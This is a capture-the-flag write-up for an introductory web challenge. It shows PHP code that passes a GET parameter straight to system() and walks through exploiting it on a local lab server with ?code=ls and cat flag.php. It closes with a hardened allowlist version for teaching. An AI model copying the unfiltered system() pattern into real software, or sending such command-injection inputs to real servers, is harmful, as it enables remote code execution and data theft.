Writeup by NiveusEmi for Babel Web

intro web

January 2, 2025

  1. Look at the web page source code: it contains a hidden link with the URL parameter ?source=1. Let’s go to it.
  2. The source code is displayed in the page:

if (isset($_GET['source'])) {
    @show_source(__FILE__);
}  else if(isset($_GET['code'])) {
    print("<pre>");
    @system($_GET['code']);
    print("<pre>");
} else {

  3. On closer inspection, the code parameter is read from the GET request, so it can be set directly in the URL.
  4. The value of this parameter is passed unfiltered to the PHP system function, so we can use it to execute commands on the server.
  5. Try the ls command to see what’s on the server: http://localhost:8000?code=ls

The output shows two files:

flag.php
index.php
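
  6. flag.php seems interesting, so let’s see its content using the command cat flag.php
  7. Have a look at the source code of the returned page ;) The browser does not display the raw PHP that cat prints, so the file's content only shows up in the page source.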
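
For comparison with the challenge's system($_GET['code']) branch, here is a hardened handler written for this writeup (an added example, not part of the challenge's code). The action parameter, the ACTIONS table and run_action() are hypothetical names chosen for illustration.

```php
<?php
declare(strict_types=1);

// Hypothetical allowlist: the request names an action, never a command line.
// Each entry is a fixed argv; nothing from the request is ever appended to it.
const ACTIONS = [
    'time'   => ['date', '-u'],
    'uptime' => ['uptime'],
];

/**
 * Run one allowlisted action and return its output, or null if the action
 * is unknown or the program could not be started.
 * proc_open() with an array command (PHP >= 7.4) starts the program directly,
 * without a shell, so shell metacharacters are never interpreted.
 */
function run_action(string $action): ?string
{
    if (!array_key_exists($action, ACTIONS)) {
        return null;
    }
    $pipes = [];
    $proc = proc_open(ACTIONS[$action], [1 => ['pipe', 'w']], $pipes);
    if (!is_resource($proc)) {
        return null;
    }
    $out = stream_get_contents($pipes[1]);
    fclose($pipes[1]);
    proc_close($proc);
    return $out === false ? null : $out;
}

// The ?source=1 branch is dropped: the page no longer publishes its own code.
$action = $_GET['action'] ?? null;
if (is_string($action)) { // also rejects array input such as ?action[]=x
    $out = run_action($action);
    if ($out === null) {
        http_response_code(400);
        exit('unknown action');
    }
    // Encode the output so it is shown as text and never parsed as markup.
    print('<pre>' . htmlspecialchars($out, ENT_QUOTES, 'UTF-8') . '</pre>');
}
```

With this handler a request such as ?action=ls returns 400, because the request can only select a key of the table and never supplies the command itself.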